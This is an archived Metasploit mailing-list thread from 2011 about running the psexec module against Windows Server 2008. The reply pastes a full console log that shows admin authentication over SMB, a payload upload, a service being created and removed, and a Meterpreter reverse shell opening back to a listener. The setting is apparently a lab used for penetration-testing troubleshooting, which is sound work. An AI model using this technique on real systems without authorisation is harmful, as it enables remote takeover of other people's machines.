Home page logo
/

metasploit logo Metasploit mailing list archives

Re: Psexec on W2K8
From: Rob Fuller <mubix () room362 com>
Date: Fri, 20 May 2011 14:40:47 -0400

Any idea what GPO's are applied? Here is a session I just did against
a Win2k8R2 DC:

[*] Started reverse handler on 172.16.195.1:4444
[*] Connecting to the server...
[*] Authenticating to 172.16.195.130:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \iNvFKRbm.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 () ncacn_np:172.16.195.130[\svcctl]
...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 () ncacn_np:172.16.195.130[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (mtucOXte - "MsosjwWts")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \iNvFKRbm.exe...
[*] Sending stage (749056 bytes) to 172.16.195.130
[*] Meterpreter session 1 opened (172.16.195.1:4444 ->
172.16.195.130:64809) at Fri May 20 14:25:59 -0400 2011


For some reason recently I've been having troubles with other payloads
with Win7 and 2k8 but reverse_tcp works great.

Can you post or send the log entry? (minus identifying pieces of course ;-)


--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org



On Fri, May 20, 2011 at 8:47 AM, Flippen, Benoit C <FlippenBC2 () state gov> wrote:
Anyone have any luck running psexec on a W2K8 box?

Using admin credentials, it drops the file, creates the service, etc.,
but never gets the payload executed. On the remote system, the event
logs show an error about interactive services not being allowed in W2K8.

Any ideas? I'm sure it's something simple I'm missing.

Benoit



This email is UNCLASSIFIED
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault